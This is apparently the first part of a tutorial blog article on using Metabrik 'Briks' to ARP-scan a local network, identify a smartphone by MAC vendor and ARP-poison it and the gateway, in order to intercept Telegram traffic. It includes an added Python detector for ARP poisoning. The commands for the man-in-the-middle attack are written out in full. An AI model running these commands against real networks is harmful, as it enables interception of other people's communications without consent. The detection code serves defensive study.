It is said that, by default, messages sent to a contact through Telegram (a messaging application for smartphones) are not encrypted. You have to enter a specific menu named “New Secret Chat” to enable end-to-end encryption. Let’s verify that this is indeed the case by using some Briks.
Try by yourself using the Docker image:
docker pull metabrik/metabrik
docker run -it metabrik/metabrik
Let’s load some Briks for the work
We will need to perform a Man-in-The-Middle (MiTM) attack on our local network to allow interception of traffic from a smartphone to Telegram servers or remote peers. The network::arp Brik has such a function. We will also need to become a router, or the intercepted traffic will be lost: network::route comes to the rescue. Then we will have to analyse the traffic itself; we will use the Briks network::read, network::stream and client::whois to locate Telegram IP addresses. We will also use lookup::oui to find a potential smartphone on the network.
use network::arp
use network::route
use network::read
use network::stream
use lookup::oui
use client::whois
Also, you have to execute the update Command on the lookup::oui Brik so it fetches the OUI file from the IEEE.
run lookup::oui update
Performing the MiTM attack
We will use ARP poisoning to perform a standard LAN MiTM attack. But we don’t want to poison everyone; we just want to listen to one smartphone’s traffic. We will use some ARP scanning techniques to gather available neighbors, and we will perform a lookup on each MAC address to retrieve the vendor. This information will directly lead us to a smartphone.
run network::arp scan
my $scan = $RUN
my $mac = [ keys %{$RUN->{by_mac}} ]
run lookup::oui from_hex $mac->[0]
run lookup::oui from_hex $mac->[1]
Looks like we have found a Motorola smartphone. Perfect target for us. To gather its IP address, just issue a Command that reads the data from the saved variable:
my $victim = $scan->{by_mac}{"5c:51:88:XX:XX:XX"}
Now, we want to intercept traffic between the victim and the Internet. Thus, we will also attack the gateway. We have to find its IP address and configure our host as a network router, and then we will be ready to perform the ARP poisoning:
my $victim = "192.168.1.20"
run network::route default_ipv4_gateway
my $gateway = $RUN
run network::route enable_router_ipv4
run network::arp full_poison $victim $gateway
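From the defender’s side, the poisoning above leaves a recognisable trace on the wire: the gateway IP suddenly answers from a new MAC, and that same MAC also answers for the victim. Here is an added example (not Metabrik code, and not part of the original article) that replays a constructed list of ARP replies through a learned IP-to-MAC table and reports both signals; the addresses and MACs are made up.

```python
from collections import defaultdict

# Constructed sample of ARP replies as a passive monitor on the LAN would see
# them: (sender IP, sender MAC). The last two frames mimic the full_poison of
# the victim/gateway pair: one MAC claims both the gateway and the victim IP.
SAMPLE_ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:55"),   # legitimate gateway
    ("192.168.1.20", "5c:51:88:aa:bb:cc"),  # the smartphone
    ("192.168.1.30", "de:ad:be:ef:00:01"),  # another host (the poisoner's own IP)
    ("192.168.1.1", "de:ad:be:ef:00:01"),   # gateway IP now claimed by another MAC
    ("192.168.1.20", "de:ad:be:ef:00:01"),  # victim IP claimed by that same MAC
]


def detect_arp_poisoning(replies, gateway_ip):
    """Replay ARP replies through a learned IP->MAC table and return alerts.

    Two signals are reported:
      - ('ip_remapped', ip, old_mac, new_mac): an IP already bound to one MAC
        is announced with another one;
      - ('gateway_and_host_shared', mac, host): one MAC answers for the gateway
        and for a host, the pattern produced by poisoning both ends at once.
        The host list also exposes the poisoner's legitimate address.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    reported = set()
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append(("ip_remapped", ip, known, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        claimed = mac_to_ips[mac]
        if gateway_ip in claimed and len(claimed) > 1:
            for host in sorted(claimed - {gateway_ip}):
                if (mac, host) not in reported:   # alert once per (mac, host)
                    reported.add((mac, host))
                    alerts.append(("gateway_and_host_shared", mac, host))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES, "192.168.1.1"):
        print(alert)
```

On a real network the same logic can be fed from a sniffer or from periodic snapshots of the ARP cache; the first three sample frames alone produce no alert, so a stable network stays quiet.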
Conclusion
We have seen how to scan the local network in search of a specific device and how to launch a Man-in-The-Middle attack. This concludes the first part of this article. You may think it is a little bit short, but you will probably be eager to read the next part 🙂